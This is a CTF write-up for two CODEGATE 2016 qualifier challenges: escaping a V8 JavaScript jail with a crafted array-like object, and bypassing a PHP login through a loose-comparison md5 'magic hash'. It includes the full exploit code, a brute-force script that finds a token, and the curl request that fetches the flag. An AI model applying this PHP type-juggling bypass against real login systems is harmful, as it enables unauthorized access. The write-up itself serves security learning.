

CODEGATE 2016 Quals - Writeup

CTF

I participated in CODEGATE 2016 Quals as a member of Ping-Mic.

solved:

  • JS_is_not_a_jail (misc100)

helped to solve:

  • Combination Pizza (web222)

JS_is_not_a_jail

First, I checked the challenge100 function.

[JavaScript Jail]
let start to type on 'challenge100'
V8 version 5.1.0 (candidate)
d8> challenge100
function (arr) {
        // Pool the gate draws replacement characters from (see the first loop below).
        var random_value = "ac1a39300ce7ee8b6cff8021fd7b0b5caf5bc1c316697bd8f22e00f9fab710d6b8dba23ca80f6d80ca697e7aa26fd5f6";
        // What arr[0..7] must read back as after that overwrite.
        var check = "20150303";

        // Gate 1: reject null and undefined.
        if((arr === null || arr === undefined)) {
            print("arr is null or undefined.");
            return;
        }

        // Gate 2: `length` has to be an OWN property; an inherited one is rejected.
        if(!arr.hasOwnProperty('length')) {
            print("length property is null or undefined.");
            return;
        }

        // Gate 3: only a negative length passes. No genuine Array can have one,
        // so the caller is forced to hand in a hand-built array-like object...
        if(arr.length >= 0) {
            print("i think you're not geek. From now on, a GEEK Only!");
            return;
        }

        // Gate 4: ...whose prototype is nevertheless exactly Array.prototype.
        if(Object.getPrototypeOf(arr) !== Array.prototype) {
            print("Oh.... can you give me an array?");
            return;
        }

        // Overwrite arr[0..7] with random pool characters. This function has no
        // 'use strict' directive, so an assignment to a non-writable index fails
        // silently instead of throwing, which is what the MyArray solution relies on.
        var length = check.length;
        for(var i=0;i<length;i++) {
            arr[i] = random_value[Math.floor(Math.random() * random_value.length)];
        }

        // Every slot must now equal the corresponding digit of "20150303".
        for(i=0;i<length;i++) {
            if(arr[i] !== check[i]) {
                print("Umm... i think 2015/03/03 is so special day.\nso you must set random value to 20150303 :)");
                return;
            }
        }
        print("Yay!!");
        // `flag` is a free variable supplied by the jail's environment, not defined here.
        print(flag);
    }
d8> 

Next, I wrote a MyArray constructor. It has a length property that returns -1, and its values cannot be rewritten. To prevent rewriting, I used Object.defineProperty().

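/**
 * Builds the array-like object that passes every gate of challenge100:
 * prototype === Array.prototype, an OWN `length` of -1 (a real Array can
 * never have one, so a hand-built object is required), and indices 0..7
 * preset to the digits of "20150303".
 *
 * The original wrote through `this` while being invoked without `new`; in
 * sloppy mode that silently turned the global object into the "array"
 * (and it throws under strict mode / ES modules, where `this` is undefined).
 * Allocating a fresh object gives the same result without that side effect
 * and works in both modes. The index properties are left writable here;
 * the caller still locks them with Object.defineProperty before handing the
 * object to challenge100.
 *
 * @returns {object} array-like with length -1 and arr[0..7] spelling "20150303"
 */
function MyArray() {
    var preset = "20150303";
    // Object.create gives the exact prototype identity Gate 4 compares against.
    var arrLike = Object.create(Array.prototype);
    for (var i = 0; i < preset.length; i += 1) {
        arrLike[i] = preset[i];
    }
    // Assignment creates an OWN `length` (Array.prototype.length is writable),
    // which is what the hasOwnProperty('length') gate requires.
    arrLike.length = -1;
    return arrLike;
}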
// Build the candidate object and lock its preset digits before handing it over.
var _arr = MyArray();
console.log(Object.getOwnPropertyNames(_arr));
// challenge100 overwrites arr[0..7] with random characters; making each index
// non-writable turns those sloppy-mode assignments into silent no-ops, so the
// preset "20150303" is what its second loop reads back.
for (var idx = 0; idx <= 7; idx += 1) {
    Object.defineProperty(_arr, String(idx), { writable: false });
}
console.log(_arr.length);

challenge100(_arr);

/**
 * Local stand-in for the jail's challenge100 gate, so the MyArray trick can
 * be debugged under node: d8's `print` is mapped to console.log and the
 * server-side `flag` is replaced by a dummy string. Every printed message is
 * kept byte-for-byte identical to the remote function's.
 *
 * @param {*} arr - candidate object; to reach the flag it must own a negative
 *   `length`, have Array.prototype as its prototype, and read back "20150303"
 *   at indices 0..7 after they have been overwritten with random characters.
 * @returns {undefined}
 */
function challenge100(arr) {
    var random_value = "ac1a39300ce7ee8b6cff8021fd7b0b5caf5bc1c316697bd8f22e00f9fab710d6b8dba23ca80f6d80ca697e7aa26fd5f6";
    var check = "20150303";
    var print = console.log;
    var flag = "test_flag{this is test}";

    // Gate 1: `== null` matches both null and undefined.
    if (arr == null) {
        print("arr is null or undefined.");
        return;
    }

    // Gate 2: `length` must be an own property, not an inherited one.
    if (arr.hasOwnProperty('length') === false) {
        print("length property is null or undefined.");
        return;
    }

    // Gate 3: only a negative length passes, which no real Array can have.
    var len = arr.length;
    if (len >= 0) {
        print("i think you're not geek. From now on, a GEEK Only!");
        return;
    }

    // Gate 4: the prototype must still be exactly Array.prototype.
    if (Object.getPrototypeOf(arr) !== Array.prototype) {
        print("Oh.... can you give me an array?");
        return;
    }

    var count = check.length;
    var pos;
    // Overwrite every slot with a random character drawn from the pool.
    for (pos = 0; pos < count; pos += 1) {
        arr[pos] = pickRandomChar(random_value);
    }
    console.log(arr);

    // Every slot must now read back the expected digit.
    for (pos = 0; pos < count; pos += 1) {
        if (check[pos] !== arr[pos]) {
            print("Umm... i think 2015/03/03 is so special day.\nso you must set random value to 20150303 :)");
            return;
        }
    }
    print("Yay!!");
    print(flag);

    // One uniformly random character of `pool` (same draw as the remote code).
    function pickRandomChar(pool) {
        return pool[Math.floor(Math.random() * pool.length)];
    }
}

Third, I ran this code locally to see whether it works; node is a good debugging environment.

Finally, I reformatted this code and pasted it into the JavaScript Jail.

// Same solution as above, collapsed so that each statement is a single d8 input line.
MyArray = function (){this.__proto__ = Array.prototype; this[0] = "2"; this[1] = "0"; this[2] = "1"; this[3] = "5"; this[4] = "0"; this[5] = "3"; this[6] = "0"; this[7] = "3"; this.length = -1; return this; }; 
var _arr = MyArray();
console.log(Object.getOwnPropertyNames(_arr));
for(var i = 0; i <= 7; i+=1){_arr = Object.defineProperty(_arr, i.toString(10), { writable: false });}
$ nc 175.119.158.131 1129 
[JavaScript Jail]
let start to type on 'challenge100'
V8 version 5.1.0 (candidate)
d8> MyArray = function (){this.__proto__ = Array.prototype; this[0] = "2"; this[1] = "0"; this[2] = "1"; this[3] = "5"; this[4] = "0"; this[5] = "3"; this[6] = "0"; this[7] = "3"; this.length = -1; return this; }; 
var _arr = MyArray();
console.log(Object.getOwnPropertyNames(_arr));
for(var i = 0; i <= 7; i+=1){_arr = Object.defineProperty(_arr, i.toString(10), { writable: false });}
challenge100(_arr);MyArray = function (){this.__proto__ = Array.prototype; this[0] = "2"; this[1] = "0"; this[2] = "1"; this[3] = "5"; this[4] = "0"; this[5] = "3"; this[6] = "0"; this[7] = "3"; this.length = -1; return this; }; 
function (){this.__proto__ = Array.prototype; this[0] = "2"; this[1] = "0"; this[2] = "1"; this[3] = "5"; this[4] = "0"; this[5] = "3"; this[6] = "0"; this[7] = "3"; this.length = -1; return this; }
d8> var _arr = MyArray();
undefined
d8> console.log(Object.getOwnPropertyNames(_arr));
(d8):1: ReferenceError: console is not defined
console.log(Object.getOwnPropertyNames(_arr));
^
ReferenceError: console is not defined
    at (d8):1:1

d8> for(var i = 0; i <= 7; i+=1){_arr = Object.defineProperty(_arr, i.toString(10), { writable: false });}
[]
d8> 
challenge100(_arr);challenge100(_arr);
Yay!!
flag is "easy xD, get a more hardest challenge!"
undefined

Combination Pizza

This is _login_ck.php:


<?php
    include "./lib/for_flag.php";
    include "./lib/lib.php";

    // $user and $pass are escaped before being interpolated into the quoted SQL
    // literals below; $token is taken raw but is only ever passed to md5().
    $user = mysql_real_escape_string($_POST['user']);
    $pass = mysql_real_escape_string($_POST['pass']);
    $token = $_POST['token'];

    // Legacy mysql_* API (deprecated in PHP 5.5, removed in 7.0); a prepared
    // statement via mysqli/PDO would avoid string-building the query at all.
    $que = "select user from login where user='{$user}' and pass=md5('{$pass}')";
    $result = mysql_query($que);
    $row = mysql_fetch_array($result);

    // Loose comparison; harmless against the plain word 'Admin', unlike the one below.
    if($row['user'] == 'Admin')
    {
        // VULNERABLE: `==` between two strings that both look numeric compares
        // them as numbers. "0e" followed only by digits parses as 0 in scientific
        // notation, so ANY md5 of the form 0e<digits> satisfies this check
        // (0 == 0) — the type-juggling hole the writeup exploits.
        // Fix: hash_equals(md5("blog".$token), '0e689047178306969035064392896674')
        // or at least a strict `===`.
        if(md5("blog".$token) == '0e689047178306969035064392896674')
        {
            echo "good job !!!<br />FLAG : <b>".$flag."</b>";
        }
        else
        {
            echo "Incorrect Token";
        }
    }
    else
    {
        echo "Incorrect ID or Password";
    }

?>

I noticed that md5("blog".$token) == '0e689047178306969035064392896674' becomes 0 == 0 (a numeric comparison) for a certain $token, because PHP's loose == compares two numeric-looking strings as numbers. @mrtc0 found this post:

PHP: md5('240610708') == md5('QNKCDZO') | Hacker News

So I ran this PHP script:

<?php
// Searches for a token whose md5("blog".$token) is a "0e<digits>" string:
// PHP's loose == then compares it numerically with the equally "0e..." target,
// i.e. 0 == 0, which is exactly the check in login_ck.php.
// NOTE(review): lowercase "p" is listed twice and uppercase "P" is missing, so
// candidates containing "P" are never tried (and those with "p" are tried twice).
$test = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "p", "Q", "R", "S", "T", "U"];
// Five nested loops: every 5-character combination of the candidate list.
// $len is recomputed in each loop header but always equals count($test).
for($i = 0, $len = count($test); $i < $len; $i += 1){
for($j = 0, $len = count($test); $j < $len; $j += 1){
for($k = 0, $len = count($test); $k < $len; $k += 1){
for($l = 0, $len = count($test); $l < $len; $l += 1){
for($m = 0, $len = count($test); $m < $len; $m += 1){
    // Candidate = newline + five characters; urlencode() below prints it in the
    // form usable in a POST body (hence the %0A prefix in the result).
    $token  = "\n" . $test[$i] . $test[$j] . $test[$k] . $test[$l] . $test[$m];
    // Same loose comparison as the target script, so a hit here is a hit there.
    if(md5("blog".$token) == '0e689047178306969035064392896674'){
        echo "\$token = " . urlencode($token) . "\n    => " . md5("blog".$token) . "\n";
    }
}
}
}
}
}
$ php ./web222_n.php
$token = %0AtDMwy
    => 0e163908937933900237353340463810

Good!! $token = "%0AtDMwy" gives me the flag:

curl http://175.119.158.137:9242/f00885da9ad9ad5fcccaa8fc1217e3ae/login_ck.php -d "user=Admin" -d "pass=adminpw" -d 'token=%0AtDMwy' 
good job !!!<br />FLAG : <b>jjambbong_WEBHACKING!!@!</b